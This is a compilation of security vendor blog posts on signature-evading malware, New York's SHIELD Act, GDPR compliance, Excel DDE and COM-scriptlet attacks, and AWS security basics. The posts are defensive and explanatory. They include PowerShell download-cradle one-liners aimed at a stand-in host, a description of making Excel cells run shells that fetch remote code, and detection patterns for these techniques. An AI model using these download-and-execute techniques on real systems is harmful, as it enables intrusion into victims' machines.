Needless to say, the malware-free techniques — Office scripts, PowerShell, HTTP — are very hard to detect using standard security monitoring tools. The scripts themselves are heavily obfuscated — see the PowerShell obfuscation series to understand the full impact — and are regularly tweaked, so defenses that rely on scanning for specific keywords or calculating hashes are useless.
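To see why hash-based signatures fail here, consider a minimal sketch. The two PowerShell one-liners below are hypothetical, illustrative payloads (not real-world samples), differing only in a variable name — the kind of tweak an attacker can automate:

```python
import hashlib

# Two "variants" of the same obfuscated one-liner. A trivial rename
# produces a completely different SHA-256, so a signature built from
# the last sample never matches the next one.
variant_a = b"$w=New-Object Net.WebClient;$w.DownloadString('http://example.test/a')"
variant_b = b"$v=New-Object Net.WebClient;$v.DownloadString('http://example.test/a')"

hash_a = hashlib.sha256(variant_a).hexdigest()
hash_b = hashlib.sha256(variant_b).hexdigest()

print(hash_a == hash_b)  # False: a trivial rename yields a brand new "unique" sample
```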

The Verizon 2018 DBIR validates what I’m saying. Their stats indicate that 70-90% of malware samples are unique to an organization. Or as they put it:

… basically boil down to “AV is dead.” Except it’s not really. Various forms of AV, from gateway to host, are still alive and quarantining nasty stuff every day. “Signatures alone are dead” is a much more appropriate mantra that reinforces the need for smarter and adaptive approaches to combating today’s highly varied malware.

Towards a Better 2018

If you’ve been paying attention, then not too much of what the Verizon DBIR is saying should come as a shock. However, I do encourage you to read the introductory summary and then skip down to the industry vertical section to get more specifics relevant to your situation — mileage does vary. For example, ransomware is rampant in healthcare, and Remote Access Trojans (RATs) are more prevalent in banking.

And now for my brief sermon on what to do about the DBIR’s bleak statistics.

Perimeter defenses are not effective in keeping hackers out. You need them, just as you need locks on windows and doors, but the hackers have found simple and cheap methods to get around these security measures.

To make 2018 a better security year, your first step is to admit that expensive firewalls and scanner infrastructure won’t solve everything — admit it right now, take a huge weight off your shoulders, and feel better! — and so secondary defenses have to be in place.

This means finding and putting more restrictive access rights on your sensitive data files to limit what the hackers can potentially discover, and then using monitoring techniques that alert your security teams if the attackers access these files.

Want to move beyond perimeter security? Click here to request a free risk assessment today!

SHIELD Act Will Update New York State’s Breach Notification Law


Those of you who have waded through our posts on US state breach notification laws know that there are very few states with rules that reflect our current tech realities. By this I mean there are only a handful that consider personally identifiable information (PII) to include internet-era identifiers, such as email addresses and passwords. And even fewer that would require a notification to state regulators when a ransomware attack occurs.

Access Alone, or Access and Acquire, That is the Question!

Remember the loophole in state breach laws with respect to ransomware?

Just about all state notification laws define a breach to be unauthorized access and acquisition. Since ransomware merely accesses the data — it encrypts it — without copying or exfiltrating it, such an attack would not have to be reported under that definition.

I’ve been able to find only three states — though there may be more lurking — that consider a breach to be either access or acquisition: New Jersey, Connecticut, and, most recently, North Carolina.

But late last year, New York began making a bid to join this elite club. The NY Attorney General Eric Schneiderman proposed the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act) to “close major gaps in New York’s data security laws, without putting an undue burden on businesses.”

NY’s SHIELD — love that abbreviation — will update the state’s legal definition of a breach to use the “or” word, thereby closing the ransomware gap.

By the way, if you’re wondering whether other federal and international data security laws have ransomware loopholes — they do! — and breach notification legalese brings out your inner attorney, you’ll love our in-depth white paper on this very subject.

Anyway, the AG also proposes to tweak the state’s current PII definition to now encompass user name or email address (along with a password), biometric data, and even HIPAA-style protected health information or PHI.

NYS Senate Bill S6933A: Access to OR acquisition. Got that?

The Data Empire State

Those who love the wonky details can peruse the SHIELD Act here and review all the changes it will make to the current legal language on the books.

SHIELD will also require something new: companies will need “reasonable administrative, technical, and physical safeguards for sensitive data” — the standard boilerplate that we see in many federal laws. This is as non-prescriptive as it gets, so for now this mostly serves as a warning to companies to have some minimal security policies and procedures in place.

SHIELD is just a legislative proposal at this point, and has yet to be finalized and passed by the legislature. We still have a long way to go. But once that happens, I expect we’ll get additional guidance on some of the law’s nuances from the state. We’ll keep you posted.

I’d like to point out that the SHIELD Act covers any company that does business in NYS. This means that it does have a GDPR-like extended territorial scope aspect to it — in this case, the law crosses state boundaries. In other words, if a California-based e-commerce company collects data from NYS residents, then they would be covered by SHIELD, and would have to report, for example, an exposure or access of PII to NYS authorities.

Yeah, there are some legal questions about whether NYS can assert jurisdiction in other states.

One last wonky point: New York State’s other data security law — the Department of Financial Services’ (NYSDFS) own cyber regulations — covers banks and financial companies. It also has breach notification rules, which we wrote about here.

In short: New York’s financial companies are covered by the NYSDFS regs; for everyone else, the SHIELD Act will apply.

With all this data security legal innovation, New York is at the forefront among states in protecting data and setting a bar — although initially low — for security practices for anyone doing business in the Empire State.

Varonis Perspective

With the Facebook hearings just about over, it appears that Congress may legislate at a national level, at least in terms of data privacy. There are many proposed breach notification and data protection laws also kicking around Congress. A much-needed national law may be on the horizon as well.

The data security legal winds are changing! Why wait to be taken by surprise at a later date?

You can start preparing by reviewing existing security plans and procedures, paying particular attention to incident or breach response. In particular, to support NY’s breach rule requiring notification on unauthorized access to PII, you’ll need to be able to classify your file system data, and then alert IT security when specific types of sensitive file data are accessed in an unusual way.

Not everyone, ahem, can do this!

You’ll also find the Varonis site to be an incredibly rich resource for data security wisdom. We have many posts and white papers on existing standards and their controls — PCI DSS, the NIST 800 family, SANS Critical Security Controls (CSC) — that will provide ideas and inspiration for meeting New York’s new rules.

And we explain how Varonis can help with our DatAdvantage, DatAlert, and DataPrivilege products.

Need to know more? Click here to request a free risk assessment today!

What Experts Are Saying About GDPR


You did get the memo that GDPR goes into effect next month?

Good! This new EU regulation has a few nuances and uncertainties that will generate more questions than answers over the coming months. Fortunately, we’ve spoken to many attorneys with deep expertise in GDPR. To help you untangle GDPR, the IOS staff reviewed the old transcripts of our conversations, and pulled out a few nuggets that we think will help you get ready.

Does the GDPR cover US businesses? Is the 72-hour breach notification rule strict? Do you need a DPO?  We have the answers below!  If you have more time, listen to our podcasts for deeper insights.

Privacy By Design Raised the Bar

Inside Out Security: Tell us about GDPR, and its implications on Privacy by Design.

Dr. Ann Cavoukian: For the first time, right now the EU has the General Data Protection Regulation, which passed for the first time, ever. It has the words, the actual words, “Privacy by Design” and “Privacy as the default” in the statute.

What I tell people everywhere that I go to speak is that if you follow the principles of Privacy by Design, which in itself raised the bar dramatically from most legislation, you will virtually be assured of complying with your regulations, whatever jurisdiction you’re in.

Because you’re following the highest level of protection. So that’s another attractive feature about Privacy by Design is it offers such a high level of protection that you’re virtually assured of regulatory compliance, whatever jurisdiction you’re in.


Leave a review for our podcast & we'll send you a pack of infosec cards.

US Businesses Also Need To Prepare for GDPR

Inside Out Security: What are some of the concerns you’re hearing from your clients on GDPR?

Sue Foster: When I speak to my U.S. clients, if they’re a non-resident company that promotes goods or services in the EU, including free services like a free app, for example, they’ll be subject to the GDPR. That’s very clear.

Also, if a non-resident company is monitoring the behavior of people who are located in the EU, including tracking and profiling people based on their internet or device usage, or making automated decisions about people based on their personal data, the company is subject to the GDPR.



Is the 72-hour rule as strict as it sounds?

Inside Out Security: What we’re hearing from our customers is that the 72-hour breach rule for reporting is a concern. And our customers are confused — and after looking at some of the fine print, we are as well! So I’m wondering if you could explain the breach reporting in terms of thresholds: what needs to happen before a report is made to the DPAs and consumers?

Sue Foster: So you have to report the breach to the Data Protection Authority as soon as possible, and where feasible, no later than 72 hours after becoming aware of the breach.

How do I know if a breach is likely to ‘result in a risk to the rights and freedoms of natural persons’?

There is actually a document you can look at to tell you what these rights and freedoms are. But you can think of it basically in common sense terms. Are the person’s privacy rights affected, are their rights and the integrity of their communications affected, or is their property affected?

If you decide that you’re not going to report after you go through this full analysis and the DPA disagrees with you, now you’re running the risk of a fine of up to 2% of the group’s global turnover … or gross revenue around the world.

But for now, and I think for the foreseeable future, it’s going to be about showing your work, making sure you’ve engaged, and that you’ve documented your engagement, so that if something does go wrong, at least you can show what you did.



What To Do When You Discover A Breach

Inside Out Security: What are some of the most important things you would do when you discover a breach? I mean, if you could prioritize it in any way. How would you advise a customer about how to have a breach response program in a GDPR context?

Sheila FitzPatrick: Yeah. Well first and foremost, you do need to have in place, before a breach even occurs, an incident response team that’s not made up of just the IT. Because normally organizations have an IT focus. You need to have a response team that includes IT, your chief privacy officer. And if the person… normally a CPO would sit in legal. If he doesn’t sit in legally, you want a legal representative in there as well. You need someone from PR, communications that can actually be the public-facing voice for the company. You need to have someone within Finance and Risk Management that sits on there.

So the first thing to do is to make sure you have that group in place that goes into action immediately. Secondly, you need to determine what data has potentially been breached, even if it hasn’t. Because under GDPR, it’s not… previously it’s been if there’s definitely been a breach that can harm an individual. The definition is if it’s likely to affect an individual. That’s totally different than if the individual could be harmed. So you need to determine okay, what data has been breached, and does it impact an individual?

So, as opposed to if company-related information was breached, there’s a different process you go through. Individual employee or customer data has been breached, the individual, is it likely to affect them? So that’s pretty much anything. That’s a very broad definition. If someone gets a hold of their email address, yes, that could affect them. Someone could email them who is not authorized to email them.

So, you have to launch into that investigation right away and then classify any data that has seen an intrusion — determine what that data is classified as.

Is it personal data?

Is it personal sensitive data?

And then rank it based on is it likely to affect an individual?

Is it likely to impact an individual? Is it likely to harm an individual?

So there could be three levels.

Based on that, what kind of notification? So if it’s likely to affect or impact an individual, you would have to let them know. If it’s likely to harm an individual, you absolutely have to let them know and the data protection authorities know.



Do we need to hire a DPO?

Inside Out Security: An organization must appoint a data protection officer (“DPO”) if, among other things, “the core activities” of the organization require “regular and systematic monitoring of data subjects on a large scale.” Many Varonis customers are in the B2B space, where they do not directly market to consumers. Their customer lists are perhaps in the tens of thousands of recipients up to the lower six-figure range. First, does the GDPR apply to personal data collected from individuals in a B2B context? And second, when does data processing become sufficiently “large scale” to require the appointment of a DPO?

Bret Cohen and Sian Rudgard with Hogan Lovells: Yes, the GDPR applies to personal data collected from individuals in a B2B context (e.g., business contacts).  The GDPR’s DPO requirement, however, is not invoked through the maintenance of customer databases.

The DPO requirement is triggered when the core activities of an organization involve regular and systematic monitoring of data subjects on a large scale, or the core activities consist of large scale processing of special categories of data (which includes data relating to health, sex life or sexual orientation, racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, or biometric or genetic data).

“Monitoring” requires an ongoing tracking of the behaviors, personal characteristics, or movements of individuals, such that the controller can ascertain additional details about those individuals that it would not have known through the discrete collection of information.

Therefore, from what we understand of Varonis’ customers’ activities, it is unlikely that a DPO will be required, although this is another area on which we can expect to see guidance from the DPAs, particularly in the European Member States where having a DPO is an existing requirement (such as Germany).

Whether or not a company is required to appoint a DPO, if the company will be subject to the GDPR, it will still need to be able to comply with the “Accountability” record-keeping requirements of the Regulation and demonstrate how it meets the required standards. This will involve designating a responsible person or team to put in place and maintain appropriate policies and procedures, including data privacy training programs.


Adventures in Malware-Free Hacking, Part V


In this series of posts, we’ve been exploring attack techniques that involve minimal effort on the part of hackers. With the lazy code-free approach I introduced last time, it’s even possible to slip a teeny payload into a DDE field within Microsoft Word. And by opening the document attached to a phish mail, the unwary user lets the attacker gain a foothold on her laptop. To bring the story up to date, Microsoft ultimately closed the door on DDE attacks with a security patch late last year.

The patch adds a registry entry that disables DDE functionality within Word by default. If you still absolutely need this capability, you’re free to update the setting to bring the old DDE behavior back.

However, the original patch only covered Microsoft Word. Are there DDE capabilities in other Microsoft Office products that can be exploited in code-free style?

Yes, indeed. You can also find them in Excel.

Night of the Living DDE

Before you start shouting into your browser, I’m aware that I left you on the edge of your seat in the previous post describing COM scriptlets. I’ll get to them further below.

Let’s continue with the evil side of DDE, the Excel version.

Just as with Word, Excel’s somewhat hidden DDE capabilities allow you to execute a bit of shell code without breaking a sweat. As a long-suffering Word user, I was familiar with fields and knew a little about DDE functions.

In Excel, I was a little surprised to learn I can execute a command shell from within a cell, as demonstrated in the following:

Did you know you can do this? I didn’t.

This ability to run a Windows shell comes to us courtesy of DDE. (And yes there are other apps to which you can connect using Excel’s embedded DDE features.)

Are you thinking what I’m thinking?

Have the cmd shell in the cell launch a PowerShell session that then downloads and executes a remote string — the trick we’ve been using all along. Like I did below:

You can insert a little PowerShell to download and execute remote code within Excel. Stealthy!

You would, of course, need to explicitly enter the cell to execute this Excel formula.

So how could a hacker force this DDE command to be executed?

When the worksheet is opened, and if not otherwise configured, Excel will try to refresh these DDE links. There have long been options — buried in Trust Center — to either disable or prompt on updating links to external data sources or other workbooks.

Even without the recent patches, you can disable automatic updates of data connections or DDE links. 

Microsoft initially advised companies last year to disable automatic updates to prevent this DDE-based hack from being so easily pulled off in Excel.

These were mitigations, of course, but Microsoft was reluctant to go the same route as they did for Word, which was to provide a registry entry that would disable DDE altogether.

But in January, they bit the bullet and provided patches for Excel 2007, 2010, and 2013 that also turn off DDE by default. This article (h/t Computerworld) nicely covers the details of the patch.

Let’s Go to the Event Logs

In short, Microsoft has cut the power on DDE for MS Word and Excel — if you’ve incorporated their patches —  finally deciding that DDE is more like a bug than, clearing throat, a feature.

If you’ve not, for whatever reason, included these patches in your environment, then you can still reduce the risk of a DDE-based attack by disabling automatic updates or enabling the options that prompt users to refresh links when the document or spreadsheets are opened.
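If you want a rough defender-side triage of inbound spreadsheets in the meantime, here’s a minimal sketch. It exploits the fact that a .xlsx file is a zip archive of XML parts; the path prefix and the search patterns are my own assumptions, and this crude check won’t catch DDE abuse hiding in legacy binary .xls files:

```python
import re
import zipfile

# Telltale DDE-style formula fragments: "cmd|" shell launches and DDE() calls.
# Illustrative patterns only — a real tool would be far more thorough.
DDE_PATTERN = re.compile(r"(?i)cmd\s*\||=\s*DDE")

def has_dde_formula(xlsx_path):
    """Return True if any worksheet XML part contains a DDE-style formula."""
    with zipfile.ZipFile(xlsx_path) as z:
        for name in z.namelist():
            if name.startswith("xl/worksheets/"):
                text = z.read(name).decode("utf-8", "ignore")
                if DDE_PATTERN.search(text):
                    return True
    return False
```

A check like this belongs at the mail gateway, before the spreadsheet ever reaches a user who might click through the refresh prompt.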

And now an important question: if you’re a victim of this style of attack, would the PowerShell sessions launched by either fields in Word or a shell command in an Excel cell show up in the log?

Q: Are PowerShell sessions launched through DDE logged? A: Yes.

In my obfuscation series, I discussed how PowerShell logging has been greatly improved in recent versions of Windows. So I took a peek at the log (above), and can confirm that even when you’re launching PowerShell sessions directly from a cell function —rather than as a macro — Windows will log the event.
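What a first pass over those logged events might look like can be sketched in a few lines. The sample entries and the indicator list below are my own illustrative assumptions — real script block logging entries (Event ID 4104) are much richer, and real tooling is much smarter:

```python
# Crude triage of exported PowerShell log lines: flag anything containing a
# known download-and-execute tell. Indicator list is illustrative, not complete.
SUSPICIOUS_TELLS = ("downloadstring", "net.webclient", "invoke-expression", " -enc")

def flag_suspicious(log_lines):
    """Return the log lines containing any of the suspicious indicators."""
    return [line for line in log_lines
            if any(tell in line.lower() for tell in SUSPICIOUS_TELLS)]

sample_log = [
    "Event 4104: ScriptBlock: Get-ChildItem C:\\Users",
    "Event 4104: ScriptBlock: (New-Object Net.WebClient).DownloadString('http://example.test/payload')",
]
for hit in flag_suspicious(sample_log):
    print(hit)
```

Keyword matching like this is exactly what obfuscation defeats, of course — which is why it’s a starting point for an analyst, not a detection strategy.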

I’m not saying it would be easy for IT security to connect all the dots between the PowerShell session, an Excel document, and a phish mail and decide that this is indeed the beginning of the attack. I’ll discuss the consequences of malware-free hacking techniques in my final post in this never-ending series.

Enter the COM Scriptlet

In the previous post, I took on the subject of COM scriptlets. On their own, they are, I suppose, a neat feature that allows you to pass around code, say, JScript, as just another COM object.

But then hackers discovered scriptlets, and at a minimum, they allow the attackers to keep a very low profile on a victim’s computer — “living off the land”. This Derbycon video demos a few resident Windows tools that take remote scriptlets as arguments — regsvr32, rundll32 — and let hackers essentially conduct their attack malware-free. As I showed last time, you can easily launch PowerShell commands using a JScript-based scriptlet.

As it turns out, a very smart security researcher discovered a way to run a COM scriptlet within an Excel document. He found that something called Package is inserted into an Excel cell formula when you try to link to a document or graphic. And Package will accept a remote scriptlet (below).

Yikes, another stealthy code-free technique to launch a shell using COM scriptlets.

After doing low-level code inspection, the researcher learned that this is actually a bug in the Package software. It wasn’t meant to instantiate a COM scriptlet, just file objects.

I’m not sure whether there’s a patch for this yet. In my own exploration in a virtual Amazon WorkSpaces desktop with Office 2010, I was able to reproduce his results. When I tried again the other day, I had no success.

As we finish up this series, I hope I left you with the feeling that there’s a lot of uncertainty in what hackers can do in your environment. Even if you accept all the recent Microsoft Office patches, they still have relatively low-effort techniques, through the VBA macros I initially presented, to embed a malware payload into Word or Excel.

And if you’ve not done your patch homework, you’ve made it even easier for them to gain a foothold with code-free hacking and then perform stealthy post-exploitation.

I’ll talk about what this all means for mounting a reasonable security defense in — I promise — my final post in this saga.


Day Tripping in the Amazon AWS Cloud, Part I: Security Overview

I’ve been an occasional user of “the cloud”, a result of working out some data security ideas and threat scenarios in the Amazon EC2 environment. I played at being a system admin while setting up a domain with a few servers and configuring Active Directory on a controller. My focus was on having a Windows environment in which I could do some pen testing. But there’s more to Amazon Web Services (AWS) than EC2 computing environments, and I decided it was the right time to start exploring more of its services, especially from a security perspective.

There’s No “There” In the Cloud

It’s natural for many in IT (and corporate bloggers with IT backgrounds) to gravitate to EC2. It’s basically a virtual IT facility: Windows operating systems available on different virtual hardware, a virtual network where you don’t have to deal with cables or routers, virtual firewalls, and other network security features.

However, the cloud is more than just a recreation of the IT server room! They call it Amazon Web Services for a reason: Amazon offers computing and storage services removed from their familiar settings.

Get your AWS Services, AWS Services! Lots of choices from the AWS console.

Need just a cloud file system for sharing and working with documents? There’s Amazon WorkDocs.

What if you just want a Windows desktop environment for your small- or mid-size company without having to deal with all the messy server infrastructure? Amazon WorkSpaces is just for you.

Going a step further, what if you just need enormous amounts of raw storage for web applications, and you don’t really care that it’s not organized as a Windows file system? For that, there are Amazon S3 buckets.

Need access to an Active Directory environment? AWS Directory Service is just the ticket.

In a way the Amazon cloud — and others have similar offerings — is really a collection of separate OS services that are not tied to a specific facility or location: AWS is, of course, accessible everywhere.


The first level of security, then, is controlling access to these services. For that, AWS has — but what else? — an identity and access management system. It’s called — wait for it — IAM.

When I set up my first AWS account to use EC2, I was given root access and the ability to add new users and groups. You can think of these additional users as power users who can create and modify services in the AWS console. They’re the elite admins of the AWS cloud world.

Users can be organized into groups. And if you’re wondering where the access part of IAM comes in, it’s through something called policies. We wrote a little about these JSON-structured things with respect to S3 buckets.

My IAM crew: adminandy, dangeroudan, sleazysal, and sneakysam.

Just as you can associate a policy with a bucket, you can do the same with IAM users. I’ll talk about setting policies for AWS console users in the next post, but let’s just say that the Amazon policies ain’t very intuitive.

In my scenario, I set up a policy for an IAM group called Restricted, which allows users read-only access to the EC2 part of AWS — in other words, preventing them from launching or stopping Amazon instances. I added two users to the Restricted group: sleazysal and sneakysam.
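The post doesn’t reproduce the actual policy document, but as a rough sketch (built as a Python dict purely for illustration — the exact actions you allow would depend on your own scenario), a read-only EC2 policy for the Restricted group might look something like this:

```python
import json

# A sketch of a read-only EC2 policy document. "ec2:Describe*" matches
# the read-only Describe actions; there is no Allow for run/stop actions,
# so launching or stopping instances is not permitted.
restricted_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": ["ec2:Describe*"],
            "Resource": "*"
        }
    ]
}

# AWS expects the policy as a JSON document, which is easy to emit:
print(json.dumps(restricted_policy, indent=2))
```

The same JSON structure — Version, Statement, Effect, Action, Resource — shows up in every AWS policy, which helps once you get past the initial unfriendliness.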

By the way, there are additional security protections that Amazon provides for AWS users, including multi-factor authentication — currently supporting only special hardware fobs — and separate security credentials that, as we’ll see, can be used to access Amazon services from within a computing environment through AWS’s special command line interface, or CLI.
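Those separate credentials live in a local shared credentials file that the CLI reads. As a sketch (the key values below are placeholders, not real credentials), the file looks like this:

```ini
[default]
aws_access_key_id = AKIAEXAMPLEKEYID
aws_secret_access_key = wJalrEXAMPLESECRETKEY
```

With that in place, a command like `aws s3 ls` runs under that user’s permissions.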

Next time we’ll learn more about the not very pretty details of policies and something called Amazon resource names, or ARNs, which are the way you refer to just about everything in the Amazon-verse.
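As a quick preview, an ARN has a fixed colon-separated shape — arn:partition:service:region:account-id:resource — which makes it easy to pull apart. A small illustration (the bucket name is made up; S3 ARNs leave the region and account fields empty):

```python
# Split an ARN into its fixed colon-separated fields:
#   arn:partition:service:region:account-id:resource
def parse_arn(arn):
    keys = ["arn", "partition", "service", "region", "account_id", "resource"]
    # maxsplit=5 keeps any colons inside the resource part intact
    return dict(zip(keys, arn.split(":", 5)))

bucket_arn = parse_arn("arn:aws:s3:::my-example-bucket")
print(bucket_arn["service"])   # s3
print(bucket_arn["resource"])  # my-example-bucket
```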

Keep in mind that IAM covers users at the level of the AWS console. To set up ordinary users and their permissions, you’ll need to work with plain vanilla directory environments, such as Active Directory, which we’ll examine next time through AWS Directory services.

A completely intuitive access policy for the Restricted user group.

Some Auditing

The AWS console is really a portal for admins to launch EC2 instances and other computing environments, set up buckets, create databases, and of course monitor activities.

AWS does support auditing of AWS services, and this is done through its CloudTrail service. You can think of it as something like Microsoft’s Event Log, but not nearly as pretty — hard to believe, I know! Further on in this series, we’ll learn about Amazon Athena, which is a tool to help you tame the raw Amazon event logs.

Raw and uncooked: Amazon CloudTrail logs. We’ll use Athena to help organize it.
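To give a flavor of what “raw” means here: CloudTrail delivers events as JSON. The record below is a simplified, made-up example with just a few of the many fields a real event carries, but it shows why you end up wanting a tool like Athena:

```python
import json

# A trimmed-down, invented CloudTrail-style record for illustration.
raw = '''
{
  "Records": [
    {
      "eventTime": "2017-10-01T15:02:11Z",
      "eventName": "ConsoleLogin",
      "userIdentity": {"userName": "sneakysam"},
      "sourceIPAddress": "203.0.113.10"
    }
  ]
}
'''

trail = json.loads(raw)
for record in trail["Records"]:
    # Who did what, when, and from where — the basics of any audit trail.
    print(record["eventTime"], record["eventName"],
          record["userIdentity"]["userName"], record["sourceIPAddress"])
```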

Bucket Brigade

It’s a good time to look at a service that provides a useful real-world application, S3 buckets. Buckets have obvious use cases in storing huge image files for web applications, but they can store any corporate big-data file.

Or in the scenario I worked out, you can think of buckets as a bare-bones file locker (below).

I’m using buckets to store Word docs that I can share with other IAM users!

However, more appropriate for this type of file sharing activity is the Amazon WorkDocs service, which we’ll explore next time.

In any case, with S3 buckets you can configure access control lists for different IAM users. And for more sophisticated permissioning, you can also set up more granular policies.
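A bucket policy looks much like the IAM policies above, except it attaches to the bucket and names a Principal — the user it applies to. A sketch for illustration (the account ID and bucket name are invented; sleazysal is one of my IAM crew):

```python
import json

# A minimal bucket policy granting one IAM user read access to objects.
# The Principal is what distinguishes a bucket policy from a user policy.
bucket_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::123456789012:user/sleazysal"},
            "Action": ["s3:GetObject"],
            "Resource": "arn:aws:s3:::my-example-bucket/*"
        }
    ]
}

print(json.dumps(bucket_policy, indent=2))
```

Note the ARNs doing the work here: one names the user, the other names every object in the bucket.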

By the way, it’s relatively easy to upload files and other digital objects into the S3 buckets using the Amazon browser interface. There are even third-party apps, one of which I experimented with, that turn this into more of a file locking and sync service.

With some freeware apps, you can turn S3 buckets into a file sharing service. Btw, you’ll need to borrow a user’s IAM credentials to configure it.

What about monitoring and auditing bucket resources?

Amazon does offer a service called Macie, which it describes as “using machine learning to automatically discover, classify, and protect sensitive data in AWS”.

After reviewing Macie, I’d say it’s a data classification service with an alerting function, kind of something like this and this. You could envision, say, some corporate application uploading huge amounts of transactional data each month from several different locations into an Amazon S3 bucket. Macie would then monitor the bucket data and let you know who’s accessing it, as well as alerting you when it finds sensitive PII.

Macie lets you set regular expressions to discover PII patterns, and classify text using static strings — for example, finding the word “proprietary” or “confidential” in a document.
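This is not Macie’s actual engine, of course, but the kind of matching involved is easy to sketch: a regex for US Social Security number patterns plus a few static keywords (the sample text and SSN below are made up):

```python
import re

# A rough sketch of Macie-style content matching: one regex for
# SSN-shaped strings, plus a couple of static keyword checks.
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
KEYWORDS = ("proprietary", "confidential")

def flag_text(text):
    hits = SSN_RE.findall(text)
    hits += [w for w in KEYWORDS if w in text.lower()]
    return hits

sample = "Confidential: employee SSN 078-05-1120 on file."
print(flag_text(sample))  # ['078-05-1120', 'confidential']
```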

I’ll make the point again that Amazon’s built-in tools are not the most informative or easy to use. At a minimum, though, Macie gives you some insights into the Amazon bucket data store.

We’ll see later that it is possible to import S3 bucket objects, using the Amazon command line interface, into a standard Windows environment. And from there, with the right tools, you can do a far better analysis.

Alerts and data classification with Amazon’s Macie.

Let’s take a breath.

We’ve laid out some of the basics of the AWS environment, and looked at a few security and auditing ideas. Next time we’ll take a closer look at some of these AWS security tools.

And then we’ll start getting into more of the meat by examining practical IT environments — particularly WorkSpaces and WorkDocs — and see what Amazon offers in terms of security.

(Spoiler alert: there ain’t much beyond standard Windows functions.)

Till next time!